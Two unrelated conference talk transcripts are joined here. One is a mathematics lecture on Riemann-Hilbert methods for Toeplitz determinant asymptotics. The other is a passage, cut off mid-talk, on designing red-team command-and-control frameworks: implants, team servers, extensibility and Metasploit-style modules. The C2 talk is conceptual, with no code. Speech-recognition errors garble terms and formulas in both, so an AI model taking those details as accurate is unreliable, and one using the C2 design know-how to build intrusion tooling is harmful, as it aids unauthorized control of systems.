Starting with Onsager's celebrated solution of the two-dimensional Ising model in the 1940's, Toeplitz determinants have been one of the principal analytic tools in modern mathematical physics; specifically, in the theory of exactly solvable statistical mechanics and quantum field models. Simultaneously, the theory of Toeplitz determinants is a very beautiful area of analysis representing an unusual combinations of profound general operator concepts with the highly nontrivial concrete formulae. The area has been thriving since the classical works of Szegö Fisher and Hartwig and Widom, and it very much continues to do so. In the 90s, it has been realized that the theory of Toeplitz and Hankel determinants can be also embedded in the Riemann-Hilbert formalism of integrable systems. The new Riemann-Hilbert techniques proved very efficient in solving some of the long-standing problems in the area. Among them are the Basor-Tracy conjecture concerning the asymptotics of Toeplitz determinants with the most general Fisher-Hartwig type symbols and the double scaling asymptotics describing the transition behavior of Toeplitz determinants whose symbols change from smooth, Szegö to singular Fisher-Hartwig types. An important feature of these transition asymptotics is that they are described in terms of the classical Painlevè transcendents. The later are playing an increasingly important role in modern mathematics. Indeed, very often, the Painlevé functions are called now special functions of 21st century''. In this mini course, the essence of the Riemann-Hilbert method in the theory of Topelitz determinants will be presented. The focus will be on the use of the method to obtain the Painlevé type description of the transition asymptotics of Toeplitz determinants. The Riemann-Hilbert view on the Painlevé function will be also explained.
10.5446/54156 (DOI)
And yes, and this is asymptotic formula. So strictly speaking, it is of course not equality, but it is quite, okay, something like this. My row is number greater than one, which actually depends on the size of this annulus where I assumed my symbol is analytic. So we can, in z on the, z on the unit circle, and this is the first column of my way. This is what I need. This is what I need. And of course d, d is sigual function. It is exponent 1 over 2 pi i c log of f of s s minus z ds. Okay, so what is also important? This phi is of course phi gamma. And all y's and d's, everything is phi gamma. So it is a, it is a deformation of my original symbol. So this is a phi gamma. Phi phi, phi gamma. Okay. So what we have then? We have then that y 1 1. So now it is, everything is at hand. So it is just a matter of certain reasonably, you know, skillful elementary analysis. I just again, maybe jumping over absolutely routine things, just outline what we have. So what we do with this? So y y 1, it is of course, we get d plus and phi gamma minus 1. d to the n, y to 1, it is just minus d plus minus 1. So it means, of course, there is no difficulty to differentiate with respect to z, these expressions. And so let me just write the final things for these, these parenthesis. So this is for this, so y 1 1 prime, y 2 1 minus y 1 1, y 2 1 prime. Of course, it is, you will get minus double d prime plus, plus prime means derivative with respect to z, of course. So z equal to minus 1, phi gamma minus 1, z to the n plus phi gamma minus 2, phi gamma prime z to the n, and minus n, phi gamma minus 1. So this is our three reasonable terms. So when I differentiate with respect to z, I have to differentiate this, this and that. So that is the three corresponding terms just grouped in the natural way. So this means that my determinant can be exactly, I can write it as a, well, it is not exact equation, it is of course, this asymptotic but very kind of, so this is it. So it can be written like that. And where integral y 1, it is 2 from 0 to 1, it comes from this. So d d prime d minus 1, phi gamma minus 1, phi minus 1, 2 pi i d z, d gamma, so you see I have to multiply this by z to the minus n and this difference. So you get this, z to the minus n cancels. And I have plus, yeah, so this is i 1, i 2, it comes from here, so it is minus integral from 0 to 1, c, phi gamma minus 2, phi gamma prime, phi minus 1, 2 pi i, d z, d gamma, and i 3, it is n, 0, 1, c, phi gamma minus 1, phi minus 1, 2 pi i, d z over 2 pi i z, and d gamma. So these are three terms. Now let's start with the last one. So it should be noticed that phi minus 1 is nothing else but the derivative of phi gamma with respect to gamma. So it means that my i 3, it means that my i 3, it is just n times 0 to 1, c, d over d gamma, logarithm phi gamma, d z over 2 pi i z, d gamma. So this combination is just logarithmic derivative of phi gamma. So I can just integrate with respect to gamma. The low limit is 0. And what I get, I get n, 0 to c, logarithm phi, now there is no gamma, this phi, 2z, 2 pi i z. And this is the figure theorem, not strong figure, but this is the leading term. The linear is the exponential term. So this is what is still denoted as the logarithm phi node. This is the average of the logarithm phi. So this is the first term. Now as a kind of homework for those who want to do it, you can prove that i 2 is 0. It is just there. But again, playing with the exact. So what we will get, so this time I am not going to represent this as a derivative with respect to gamma, but in fact, open up the formula for phi gamma and perform the integration with respect to z. An integration with respect to z, just without, so for each gamma fixed integration with respect to z is going to be 0. So this thing is explicitly integrable with respect to z. And it gives two terms. Logarithm of phi, logarithm of gamma of phi gamma over, in the substitution of always z, and it is 0 because we assume that the index is 0. And just rush of 1 over phi gamma, which is also integral over z, it is 0. So this is the kind of the very easy exercise. You just see that just integration with respect to z is already 0. On the assumption that for each gamma, my logarithm phi gamma does not have index. So what is left, and this is I would spend a little bit more time because it is indeed this is a strong sigaterium. So how we get from the last term. This is very nice calculations. So let me put it here that I2 is 0, I3 is n, logarithm phi 0. Now I1. First of all, let me prepare myself to differentiation of d plus with respect to z. So what is d plus? d plus it is exponent of integral of c, logarithm phi gamma s, s minus z plus ds. Where z plus it is the limit from inside to z. So this is the kind of single integral. But because I made my life very easy, I assume that phi gamma is it is analytic in the annulus. I can just rewrite this as exponent 1 over 2 pi i c plus logarithm phi gamma s, s minus z. Now no plus here, but c plus it is a circle of the bigger radius than c. So before I took limit, so this is my z tilde. Before I took limit to this c, I just prepared the room. I just make the room for this limit. So this is of course a great advantage of assuming that phi is analytic. So this is formula. This is there is no singularity. I can differentiate with respect to z. And so my d plus d plus it means the limit of z tilde as z tilde goes to z from inside. And I can perform this limit if I just give the room for this limit. So d plus minus 1, d plus prime, d plus minus 1, it is in fact just 1 over 2 pi i. It is a logarithmic derivative of this exponent with respect to z. It is c, logarithm phi gamma s, s minus z squared ds. It is just this, just this of course simple expression. And this means that my, okay let me write it here, that my first integral is 2 times zero one integral of c, integral of c plus, integral of c plus. And then I have logarithm phi gamma s, s minus z squared, s lives here, s lives in c plus. And what else I have? I have also phi gamma minus 1, but this is I already know that this is a d gamma of logarithm phi gamma z. So this phi gamma minus 1 times phi minus 1, it is we already know that this is a logarithmic derivative with respect to gamma of this. And then it is what it is ds dz 2 pi i squared. No, no, no. Let's move it to the top. We're almost done. What is it? Ah. Okay, so ladies and gentlemen, you are not going to, I know you are. This is the end of the proof. No, no, this appeared. Okay. So that is important, so this is our formula at the moment so far for I1. Now I am going to make, look. It is symmetric with respect to SSS. So I argue that this is, well, 0, 1 of course, c, c plus, and then logarithm phi gamma s dz, logarithm phi gamma z plus, logarithm phi gamma z dz, dd gamma, logarithm phi gamma s over s minus z squared ds dz 2 pi i squared. There is a little cheating here. It is symmetric, but I have first to interchange c and c plus. So in fact, I have to, so my integration originally, so c, c plus, yes, so this is this, this is s. So I have actually now to move c plus inside, replace them. And so in other words, what is written here is correct plus some residue, which I, when I, when I move. But this is again kind of the homework that this residue just like I2, it is of the same type as I2 is 0. It doesn't contribute. So in principle, that is correct. Although just the reference on the symmetricity of integrand is not enough, of course. But now we are indeed practically done because this is a, this is a, this is a total derivative with respect to gamma. I can integrate with respect to gamma. And so I would have just indeed c, c plus, logarithm phi gamma z, logarithm phi gamma s, z minus s squared ds dz 2 pi i squared. Well now it is, it is just, just, just one more line to see that this is a formula which is still wrote for this, this figure, strong theory for the constant, for the constant term. So how you should. So s is greater than z, yes, s is greater than z, by absolute value. So what I supposed to do, what I suggest to do, I suggest to write this as c, logarithm phi gamma, phi gamma z. And then integration with respect to c plus, I expand, I write this as a, first I write this as a d over dz integral. Again I use, that I can write it like this, phi gamma s, s minus z, ds dz. So s with respect to c plus. So again I just use that as a square, it is a derivative with respect to z. And now I expand because s by absolute value is greater than z. I write the geometric series, gamma to z. So this can be written as, as a, oh there is no gamma anymore. I already integrated with respect to gamma, yes, there is no gamma. Yes, that's the whole point. And here it is, it is, it's going to be z to the k, c plus, logarithm phi s, s minus k minus 1, ds 2 pi i, and dz 2 pi i. And I have to differentiate with respect to z, so this is kz k minus 1, k from 1 till infinity. Again I made two things, first I expand this, this, this, this, this to the geometric progression. And then I differentiate with respect to z. And now you see that what is here, here it does not matter now if I write c plus or not in each, in each this term. This is just a logarithm phi of z, k. So this is a k, k Fourier k efficient of logarithm phi z. So this is sum from k from 1 till infinity, k, logarithm phi of k. And I still have integration c with respect to z, which is z k minus 1 dz 2 pi i. This is this, this is this part. And this is of course k, logarithm phi k, phi minus k. So this is a, this is a figure formula, strong figure theorem. But again under, under very favorable conditions. But anyway this is the illustration how, how we can reproduce, at least under the, again very analytical conditions. The, one of the kind of most famous theorem in, so if we will, we will not be able to do it, then we would can stop to develop the, the technique. So now the next, what I'm going to, to do. And today and tomorrow I'm going to, I'm going to, so this time I probably will do some switch before it tells success. So now I'm going to discuss singular, singular, singular, singular symbols. So this is where indeed we begin to, and doing it through the Riemann-Gilbert problem, where extremely naturally will come to the, to the appearance of the special functions of both type of special function of hypergeometric type and special functions of pin-libert type. And they all, not only will appear that they also, we also will obtain some non-standard point of view on special functions. So this is what I really want. It is a lot of, there is a lot of technicalities in, in, in, in the next time. And I will try to, of course, to avoid as much as I can. But I want to also to, to emphasize the idea that we just, we just not only will, we will manage with, with, but we also would kind of, you know, develop some new conceptual things. So it will be very naturally established the relation between even classical special functions and the monodrymy theory of linear systems. So it will be very essential in, in, in what I'm doing. But, but this is for tomorrow. Now I will just start. So it is Fischer-Hartwig. Fischer-Hartwig asymptotic. Fischer-Hartwig symbols. I will consider, of course, the kind of the simplest situation when I have, this is a seguro, this is a smooth. So again, this is a part which assumes to be seguro type. V is analytic in the annulus. And then I have just one singularity at point one, which is the root singularity and jump singularity. Of course, to alpha is supposed to be greater than minus one. So this is a simplest, simplest situation with the Fischer-Hartwig symbols. So I just have, have singularity. Zero now as a whole, this symbol doesn't satisfy, it not only doesn't satisfy my condition of analyticity in the annulus. But it doesn't satisfy the very general condition which is still. So there is no way to get, of course, it is not the seguro, the seguro asymptotics. And I will write the answer, by the way. The answer is this. So this is the seguro term from this V. This is also, so this is what we just had. This is the strong seguro piece which is generated by this symbol. And finally, this is what, this is a sum mixture between those singularities and seguro type, not very interesting. This is just, they should, even in the constant, is not exactly as it used to be. So it is, it is, there is a mixture with the singularities. But more important, of course, it is that we have now the qualitative change of the asymptotics. We have now power like behavior of the determinant. So we have now power like behavior of the determinant. And moreover, the part of the constant which comes from here, it is this famous, where Gx, and so this is, of course, asymptotics, and then it is little over. This goes to infinity. And G of x is a Barnes G function. Is a Barnes function which is, which is kind of the discrete, anti derivative of gamma function. So it satisfies this function relation. It is entire, and it has zero since the negative, negative integers. You can write, there is, of course, the formula in terms, just like for gamma function formula in terms of, of the products, and in terms of the contour integrals. So this is a G function. So that was a history. First of all, the situation is this term makes it, makes it non-trivial, because if it were not for that, then this, this is the corresponding, the corresponding determinant can be written explicitly. And the asymptotic, so then the Zellberg, then you remember I wrote in the beginning this n multiple integral for the top determinant. Without this term, it is why it is a famous, one of the famous version of Zellberg integral and it can be calculated, the, by Zellberg formula and the asymptotics can be, can be done. And this is a belief as, as, as what used to formulate the conjecture. Of course the interesting part, it is when you have several singularities of this type. There is a similar formula, of course, more, more involved, but for the several, for the several point. So that is a history I believe Estelle is going to, to tell about it and she contributed a lot. So the, the names that it was, Fischer Hartwig in 68, I believe they, they conjectured it from some physical from again, from, and actually Linnart also was, was involved. Yes. So it was also, yes. So that is the late sixties. Then we done, proved it for the absence of jumps, then Estelle proved it for the, for jumps, but with the real part of beta is zero, but then, then real part less than one over half, then butchering Zellberg, prove it for all alpha less than, for all of alpha nonzero and beta, real part of beta less than one half. And finally, the, the optimum result was obtained by Erhard Thorsten Erhard. Okay. It is a story. Then there was a conjecture. Okay. So that is, that is, that is very important. It has been very important development and very important piece of the theory of topless determinant. And now I'm going to sort of explain how this can be done through the Riemann-Gilbert approach. So what is, what is how we can arrive? And again, I would, my, my goal would be not, not to sort of prove it, but, but mostly to indicate the role of different special functions that show up. Some second, okay. I first should do this. Okay. Ouch. Uh, vemos that, just multiply, just calls, motherfucker. What do you mean by e to the minus i to the e? Where, what, I don't understand what? In the function phi. Function phi, yes. e to the v, this is a smooth term, the analytical term, and then there is this root singularity, and jump singularity. I didn't say that argument z is here, of course there is this z to the n. So, the branch of z to the bit is given, is of course fixed like that. So at point one you have the jump e to the plus minus, i, e to the plus minus i p bit. Is phi is defined on circle? Yeah, yeah, yeah, it is defined on circle. Now to price it, by the way, I want to notice that this of course can be written, that this absolute value of z minus one to the alpha can be written as z to minus one, let me be exact, because now it is, everything is very kind of sensitive to not to make mistake with, yeah, so it is z to the minus one to alpha, z to the minus alpha, z to the, of course, beta, it was originally, and then it was, of course, beta, it was originally, and e to the minus i p alpha plus beta. So what I am arguing, so what actually I have done, I rewrite this absolute value as this, I rewrite this absolute value as this, I rewrite this absolute value as this product, where for the function z minus one alpha, the branch is taking with this cut from one to infinity, an argument, of course, from zero to two pi, and to z minus alpha, it is from zero to infinity. So that is, so you can, it is kind of good exercise on, well, not very difficult, but on the multivariate functions. So why I feel this z of alpha, maybe I will, so you see what is z minus one to alpha, it is z minus one alpha times z bar minus one alpha, yes, so this is this, and z bar on the unit circle, it is one over z minus one alpha, and here you are, and this is how you get this, but you have to, but you have to be careful with the branches, of course, and you can check that this is a correct, correct choice. So now my phi is not, is not analytic in the analysis, of course, but still it has a lot of analytical properties outside of the, of the point one, and the idea is that in my Riemann-Hirbert problem, I would proceed, my first step would be the same, I go to the tz, which is y of z, z minus n sigma three, z greater than one, one z less than one, then for t plus, I would have, again, z to the n phi z to the minus n, and of course I can again notice that I have this factorization of one z to the minus n phi minus one one, phi minus phi minus one, one z to the n phi minus one one, and so the idea is to again introduce next step, it is s, next step it is function s, t to s, where s is again t times one z to the minus one phi z in two, one minus z n phi z in three, and it is one in one and three. But now what are now one, two, three, four? But what are now those domain? So before it was just the stripes between the smaller circle and the higher circle. Now I can analytically continue my phi only outside of this one, so I can do, so this is going to be my two, two, which before was the full, so the full strip, the full annulus, and here too it is this, so this is three, which before it was just that, was just that, and this is of course four in one. So now we have this picture, so now we see that it is going to be difference in kind of approximation of my solution outside of the small neighborhood of this one and inside. So it means now, although on those guys, on those branches I again have exponentially close to identity jump matrices, but it is only if I am far away, okay, just outside of one. So it means that now if before I would expect, and if before I kind of replace, I just threw away those, and then added, added, turns, added contours, now I cannot do it through away. So it means that now I would have, in addition to my S infinity, I would have to analyze what is going on here. Two parametrizes I need it now, the global and local. By the way, this is the same, of course, the jump matrices for S are going to be exactly as they used to be. So on those, on those branches it is this matrix, on these branches it is this matrix, and of course on the circle it is still phi minus phi minus one. And so now it is those jump matrices still close, and then I will have to expand exponentially to identity, if I am, of course, away from this neighborhood of Zewa. So now I have to work out this tool. Still first I have to expect that at least outside of this, of this, of this small neighborhood. And this solution will be well represented by, still by this S infinity, which I am now is going to call, it was the global parametrics, P and P parametrics, which is, of course, still satisfies, 0, phi, phi minus one, on the unit circle. And it is, it is identity to infinity. And I can write, formally, of course, I can write again exactly the same, the same formula for P infinity as d sigma three times, as d sigma three of z, it is one outside, and zero one negative one inside, inside. What time? How, how, how, how, how, how. I can read. Okay, thank you. Of course, now d is going to have singularity, as singularity, as z equals one. I can write the same integral formula for, for sigo function d. But of course, it's going to have singularity, as z equals one. But, but I don't care, I'm not going to use my P infinity in the neighborhood of z equals one. I'm going to use it outside, and outside it is, it is okay. I even can calculate those, those, those, those integrals. So d can be really given as, this is a part of my here when I, when I just, just corresponding to the sigo, to the sigo. So let me remind you that my, do I still have, it is still over there. Very good. So phi can be written as phi plus, plus phi minus. Where of course phi plus, it is a positive part of the Laurent series. Phi minus, it is negative part of Laurent series. So this is a simple factorization of the sigo part, the sigo part. Now here, it is this, z minus one alpha plus beta. Let me just write it, and then we can easily check it. e to the minus i pi alpha plus beta, it is when z is less than one. e to the minus v minus, z minus one z minus alpha plus beta, when z is greater than one. So it is just factorization by hand of this function of z minus one to alpha, z. Because it is, it is, it is, it does not exist this analytical expression for phi anymore. Let me, let me reconstruct it. So my phi of z was z, e to the v of z and where it is, z minus one to alpha, z minus alpha plus beta, e to the minus i pi alpha plus beta. So this of course comes from factorization of e to the v. And these terms, it is, it is, so if you, this divided by that, you exactly get this. But this kind of, you know, the factorization is exactly respects the plus and minus behavior. And this function is of course analytical inside of the, of the circle because it is, has cut from one to infinity inside of the circle, it is analytic. So forget about point one. And this function is of course analytic outside because it is now I can, I can choose the cut between one and zero, between one and zero. So this function is analytic. So this is what you usually do when you have explicit algebraic functions to factorize. This is what people in diffraction do. So just explicit factorization. So this we done with, with, with, with this global parametrics. And now the most of course difficult part, an interesting part is what to do with, and I just start. What to do with the, with the local parametrics. So global I solved explicitly. Can I solve explicitly my locally, my Riemann-Gidbert problem. That's the issue. That's the issue. What is it? Okay, maybe I stop here because it is, it is, it is just, just so we will, we will do it tomorrow. I'm not here, but maybe some other. Yes. So you said that this approach is not very good if you want to have really general functions. Yes, you have, you have, you can, because you see here with this analytical phi, I just, there is no analysis. In a sense, I just, yeah. But do you think there are some principle problems where you cannot do this or it's just more convenient to do it from a little, or there are some principle problems. So I just asked Professor Mark Laughlin, who actually managed, so there is, there is, there is a way to, to, to, to, to, to, to consider this for the more general phi. So for instance, for instance, you can of course make some rational approximations of your general phi. You can make some rational approximations, some analytical approximations. This is, this is, or you can sort of, even, even, even not to go through, from the contour, you can sort of use not the non-linear seepage descent, but non-linear stationary phase method. So that is, but again, this is, in this approach, I would not say that if I, if you want, if you want to, to produce this figure theory for the, for the best possible, possible choice of classes, I wouldn't say, I wouldn't recommend you to use Riemann-Hilbert problem. This is what I would, I would say. And the same here, but at the same time, still, yeah, you can, you can, you can, you can, you can do some approximations of your, of your given symbol by, and once again, there's, there's, there's, there's, there's, there's, there's my message is that, that the method is, is great when you solve concrete problems. It is more or less like with asymptotic analysis of integrals. So it is, you just, you just, steepest descent method for integrals. It is sort of road map, how you do, to do. If you want to write, there are, there are some text book when, when, when they try to produce the, there's, there's some general answers for the most, but I don't think anybody uses it. So it is just. Okay. It's a general question. I just wanted you to expand on how you constructed those contours. I just wanted to get some more clarity on how you constructed those contours. So, so, so, yes, so, so, let me just remind you that in my previous, see your case, it was a regional C, and I just kind of created. Three more. It is just, just because I could, I could move. I could move. You see, it was originally that the two, it was this, it was very natural that I can, that you just move it out of the unit. So you immediately makes this matrix close to identity. And the second, let's say again, if you move it inside, we immediately make the close time. So in your case, it is very natural to introduce those. But now you have a nail. You have a nail in your picture. You have a point. You cannot move it, but you can just squeeze it. So you can, you can, this is how we obtain this one. And this is what I'm going to do. In fact, if I have time tomorrow, when I will explain the, the transition, the symptoms between Seguro and future heart. And this is where the equations kind of one of the way out in the equation shows up in this. So this is exactly would be some double scaling when I would have two points. So originally is going to be kind of the good, good symbol with the two branching points which are outside and inside. And then I begin to move it. Yes, but, but the point was that there is also another contour around the, oh, that's not a contour. Huh? Okay. No, no, no, no, this one, it is not a contour. I'm sorry. Ah, it was, I was surprised. So it is not a counter. It is just, I said that, that I need to, I need to, this is my local problem. This is what I, I'll take tomorrow, you know, microscope and just move this thing and we'll see. So we have to construct, we have to construct explicitly, hopefully, solutions, some solution of this, exactly of this, of this, of these jumps. But so that it would, it would asymptotically matching with my global, global, global, global permit. And that would be how, how you would do. So that, that is the, that is the problem. So sorry about this. It is not a, it is not a, no, no, no, no. It is not a contour anymore. So yet, it of course will appear eventually. But that says it will be parametric. Huh? No, no, when I construct parametric this, parametric outside, and when I consider ratio between, between exact solution and parametric ratio, of course I will arrive to the contour when, when my, when these things would disappear. When these things would disappear, and I would have just, and this would disappear. So original, originally, so eventually I would be my transformation would be, I would, this contour I would, I would want to make it like this. Yes, so this is, this is what I would, I would, after I construct at all parametric's both, and match them. Then I would arrive to the contour where on these branches it is exponentially closed identity. And this is the power, power, the closed identity. Okay, just one more question. It's a, it's a question for both Alexander and Estelle, which is, could you get shed a little more light on the origins of why, why the, the asymptotics of Topolus determinants. Is, is of such interest. So you mentioned a few examples and maybe you could tell us your favorite application. Well, you know, the, the, the, the, now there is a, there is a difference in origin and, and, and, and the, and the, and favorite application. So now there are very many applications. So this is a, and you, you, you know, it's, you know, application. But the origin, it is a very good question Estelle already mentioned about it, how it is. So first of all, topless determinant appeared in the pure mathematically originally, of course, by Otter topless. He was a student of David Gilbert. And just they introduced as they decided to, to study the top less operators as on one hand side still quite abstract operators, but not too abstract. So you can, you can say more. So this is how it opens and then truncated. So this is how it appears first. It was, I believe, some kind of PhD of Otter topless. So what's, so Estelle maybe knows better. But then it was an also figure come up and prove his kind of weak secretarium. And then there was a gap. And then of course easing model. So using model it was ours that if it would be take too much time, but let me just say in waving. So it was on that it was, it was, it was, it was on Zyger who noticed that it was, of course, easing introduced the model just to, to, to try to explain phenomenal fear of magnetic for all of you know this critical phenomenon that you have, you have a body, you have a material, which is on one temperature, which it is kind of low, it has magnetic properties. When temperature is large, it does not have magnetic properties. So that was the easing model was introduced kind of lattice spins statistical mechanics models, which indeed in two dimensional case possess this phenomenon phase transition. So that was of course great, great, great, great breakthrough. And of course the next question was to study this phase transition in more details to study magnetization and to show it's asymptotic behavior with respect to the distance in the lattice. And the idea and the whole point was that this magnetization as a function of n was given by the topless determinant for some particular symbol, of course, for some particular symbol. Algebraic symbol. And then it was on Zyger and Kaufman they showed that indeed so that they begin to calculate the symptoms. And it was very interesting that they of course kind of if you use just the weak single theorem you get nothing because it is this leading term kind of the cancel out by the very trivial thing. So in your magnetization it is a constant it is this constant in this asymptotics. And that was that was why so first they kind of derived it by themselves not rigorous is then see go again was some month and it came the strong figure theorem. And that was that was of course but then again it was 40s late 40s. But then again it was a small gap, and then it was the works of, of course, the next kind of breakthrough in the relation between topless determinant and and physics and statistical mechanics it was the works of Mark, Mark, Mark, Mark, Mark, Mark, Mark, Mark, Mark works exactly well that was more things in between it was very helpful. that I mentioned about Tracy Baruch, McCoy, and Wu. It was when they first studied this critical phenomenon, this transition. So when T goes to critical temperature, and they discovered the appearance of Pinlevi 3. So that was perhaps one of the very first appearances in 67. And actually, again, if I have time, I plan to talk about it. Yeah, so this is, and now it is a general situation. Whenever you have some critical phenomenon to describe in especially an integrable situation, it is always Pinlevi functions. We have time for a short question. Yes. Yeah, so in the constant term of the strong zero theorem. So today we saw in the operator approach the term K times the Kth. No, in the operator approach, so in the classical, the classical, it is what I just written. It is e to the K, VK. But this is a for scale. Yes. But of course, yes, but the general, it is a freeborn determinant. Yeah, no, my question is, so today we, I mean, we saw a kind of explanation of the term KVK. So because in the anchor representation. Yes, yes, yes, yes. Is there a way to explain this structural KVK using classical analysis? No, no, no, no, I don't think so. So it is just, I just derived it. So there is no, in Riemann-Gilbert, we, so again, if I start doing the, if I start doing the matrix symbol, then I would, then two things might happen. I again can, can, can, can, can, then I can arrive to this interpretation. But two things important, the first, and so probably we will tell, because when you have matrix symbol, it is, because this formula for figure, so maybe I'm not answering your question, but I try to use your question to, to raise very interesting issues. So indeed what we have, yes, I forgot what it was. Something like this, yes, so, yes, we have this determinant. In a sense, from the practical point of view, from calculation point of view, it is not, it is a great theoretical value of the result, but it is not easy to, to use, because it is, it is kind of the statement that one infinite determinant equals another infinite determinant in a sense. Of course, this infinite makes sense. Then Widem himself, of course, shows that in the, because of this commutativity, very important issue, we arrive to this, to this formula. Then he also shows that cases when, when phi is half, half, half cut in its Laurent series, it can be in fact reduced to the, to the finite determinant. And then in fact, in the states, work and also in our work related and the material, where is material? For some algebraic symbols, matrix symbols, it turns out that this can be explicitly calculated in terms of theta functions, in the Riemann theta functions. So that was, so this is, this is, this is kind of different story. But the interesting thing is very recent, there is very recent conceptual development in, in this thing that although I said in the beginning that this is not very much of practical use of this formula, but now it is not quite correct. Because now there is a very interesting work done by Alek Lizawe and his co-authors. And also, in fact, when they first of all identify this constant as the things which is very, very fashionable in monodrymy theory with the tau function. And even more, they show that you really can use it and can make it effective to, to calculate the syntotical and calculate this. So this is, you know, it is very interesting. Back and forth developments. Okay, let's. So if you're simple, if you're very solid, if you're like two, yeah there are a few things that you can say a little bit more that are kind of general. Should I say that again? So what I said is, so Alek, I completely agree with all those statements. This is a very nice theoretical result, but it's not useful in general for computing things. There are some cases that you can do, some by accident, but in the case where the matrix is just two by two, there are some general results, but you have to find these sort of numbers that go with these two by two things. Yeah. No, no, we have to have the whole workshop devoted to the matrix, to the block to the determinants. And I would also maybe mention that in my approach, in our approach, of course, the key issue would be that if it is matrix, find matrix, then this global parametrics would have a problem. It is a linear hop factorization. I have to factorize matrix symbol now. So that is the issue from this point of view. Okay, let's thank Professor Itz again. Thank you.
Starting with Onsager's celebrated solution of the two-dimensional Ising model in the 1940's, Toeplitz determinants have been one of the principal analytic tools in modern mathematical physics; specifically, in the theory of exactly solvable statistical mechanics and quantum field models. Simultaneously, the theory of Toeplitz determinants is a very beautiful area of analysis representing an unusual combinations of profound general operator concepts with the highly nontrivial concrete formulae. The area has been thriving since the classical works of Szegö Fisher and Hartwig and Widom, and it very much continues to do so. In the 90s, it has been realized that the theory of Toeplitz and Hankel determinants can be also embedded in the Riemann-Hilbert formalism of integrable systems. The new Riemann-Hilbert techniques proved very efficient in solving some of the long-standing problems in the area. Among them are the Basor-Tracy conjecture concerning the asymptotics of Toeplitz determinants with the most general Fisher-Hartwig type symbols and the double scaling asymptotics describing the transition behavior of Toeplitz determinants whose symbols change from smooth, Szegö to singular Fisher-Hartwig types. An important feature of these transition asymptotics is that they are described in terms of the classical Painlevè transcendents. The later are playing an increasingly important role in modern mathematics. Indeed, very often, the Painlevé functions are called now special functions of 21st century''. In this mini course, the essence of the Riemann-Hilbert method in the theory of Topelitz determinants will be presented. The focus will be on the use of the method to obtain the Painlevé type description of the transition asymptotics of Toeplitz determinants. The Riemann-Hilbert view on the Painlevé function will be also explained.
10.5446/54337 (DOI)
Hello everyone, I hope you're all having a wonderful village. Welcome to my talk, designing a C2 framework. So my name is Daniel Duggan, otherwise known as Rastamase. I'm the director of zero point security. You may have seen our red team ops course. I blog over Rastamase.me as well as on offensive events. I'm on Twitter, GitHub, Discord, Slack, all the things. If you want to get in touch with me after the talk, by all means do so. So what inspired this talk? Well, it feels like to me, prior to around 2018, there weren't really that many C2s or C2 frameworks available. The main commercial offering was probably Cobb Australia, maybe a few others. And there weren't that many open source frameworks either. We had PowerShell Empire for a long time. We have Posh T2 for a long time. And then Covenant came along and some others came along. And suddenly we just had this huge boom in these C2 tools coming out. We've also had a lot more commercial ones as well. So it seems to be an area of interest for sure. And it's not infrequent that I get approached. And people are asking me if I've got any tips on how to build C2 specifically in C sharp. So I thought that this kind of talk would be helpful for those who were looking to take on the process of trying to put such a tool together. Now if you go over to the C2 matrix, it's a curated list of commercial and open source frameworks. It now lists over 70, which is pretty astounding really. More than 10 languages, everything from Python, Go, Rust, C sharp, Ruby, even PowerShell. There's no shortage of variety. And they all have different capabilities. So some by default will be can over HTTP, some will go over DNS, some will go over completely custom channels. And some might ride on legitimate services like the Dropboxes, Office 365, different Google services and things like that. If you're interested in learning more about some of the frameworks or some of the C2 tools already out there, I highly suggest you check out the matrix. It has a really useful search tool I guess where you plug in your requirements and it will recommend some tools for you based on those requirements. So let's take a step back and talk about C2. What is C2? Well, C2 is short for command and control. You can imagine a scenario where you have us cowboy operators and we have a target and the operator will deliver some sort of implant or payload, sometimes also called a rat, to that target. And the operator needs to maintain some control over that implant somehow. The implant needs to talk to the operator. The operator needs to be able to give it commands and the implant needs to give the results back to the operator. And the model that is used most, I guess, is to have some sort of intermediary control server, often called a team server. So the implant will communicate to the team server over some sort of protocol. Again, that might be HTTP or DNS or some other legit service. And the operator will have some sort of admin interface to that control server. So the implant will talk to the control server and it will kind of appear to the operator. And the operator will be able to give it tasks. The implant will grab those tasks from the server, execute them and send the results back. It's worth noting that some of these servers have the admin interface kind of built into them. While others require the operators to have a standalone client that will connect to that server for them. So conceptually, not too complicated. However, the point of this talk is about designing a C2 framework, not just designing C2. And we need to understand specifically for the purposes of this talk that C2 is not the same as a framework. So if you go onto the matrix again, for example, you'll see a lot of C2 tools that don't really readily provide that much flexibility to the operator. Maybe a lot of those tools were designed in mind with I want to demonstrate being able to use C2 over Office 365, for example. And that's pretty much all it's capable of. And to me, that's not really a framework. And this is all about frameworks. So what does a framework provide? Well, they're quite clearly listed here. So let's go through them. The first is inversion of control. Now, the overall flow of the program or the programs that are involved in this whole process are not strictly controlled by the user. So the flow is that the implant is going to talk to a server. And the operator is going to task that implant. You know, you've got that back and forth. Now, that is a flow that's not controlled by the user. You also have on the server side and on the implant side, a lot of internal flows. So the implant will receive a job. It'll process it in some way and then send results back. That internal flow is not controlled by the operator. And a lot of flows internal to the team server are not necessarily going to be controlled by the user. A framework also provides default behaviors. But most importantly, those are behaviors that can be overridden by the operator. So again, we're talking about the protocol that the implant is talking over or the protocol that the team server is listening on. A framework may provide a default protocol for that such as HTTP. But the operator should be allowed to override that in some way, either change the behaviors within that protocol or add their own complete custom protocols. A framework also provides extensibility. And that is to introduce new behaviors and capabilities that are not currently within the tool set. So if you think about implants, you might write your implant with a couple of commands, but it needs to be able to be customizable for the operator. They need to be able to add their own commands if they want their own capabilities, their own post exploitation capabilities. And they also need to be able to do that on the server side as well. So if you have something like you want reverse port forwarding on your implant, you need to be able to introduce that capability to the implant. The implant needs to send that data to somewhere, probably the team server. The team server needs to relay that traffic to wherever it needs to go. And then it needs to send that traffic back. So both sides of that process need to be extensible by the operator to accommodate that. A framework also provides reusable components, which I think is self-explanatory, but they're components that the framework provides to make the operators life easier. We'll see an example of that on the next slide. So this is an example I've taken from the Metasploit framework. Metasploit is a very mature product at this point, and it's great to look at if we're looking for inspiration on those frameworky things. But if you're not familiar with Metasploit, anybody can write a module for it. Anybody can write a new module or an exploit module for that framework for other people to use. And being a framework, it provides a lot of helpers for you in writing those modules. So this example is taken from the PS exec module. And the first thing you do in a module is to define some module information. So this includes a name, a description, an author or multiple authors, references, and so on and so forth. And that information from the module is picked up by the rest of the framework so that as the operator, whilst you're using the UI and you search for a module, you can search it by name or whatever. And then it comes up and you can see the name, you can see its description and a bunch of other things. You can also register options. So this being a PS exec module, the author here has said, you can define options for the service name, paths, and a bunch of other things that are important to that module. But more importantly, there are some options that you don't have to explicitly define in the module. So the framework knows that this is like a remote exploit module or whatever. It knows that it needs the R host or your targets. And the 